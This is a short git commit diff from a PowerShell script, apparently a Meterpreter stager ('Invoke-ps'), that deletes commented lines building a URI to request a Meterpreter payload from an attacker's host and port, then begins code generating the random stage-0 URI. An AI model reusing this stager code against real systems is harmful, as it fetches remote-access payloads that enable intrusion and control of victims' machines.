removed comments

This commit is contained in:
Jonathan Echavarria
2015-06-12 19:15:43 +00:00
parent 6bdf829126
commit a826b89480

View File

@@ -404,9 +404,7 @@ function Invoke-ps
}
}
# Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
# # $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
# # Write-Verbose "Requesting meterpreter payload from $Request"
# Meterpreter to initiate stage 0.
$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
$x = ""
function sum($v){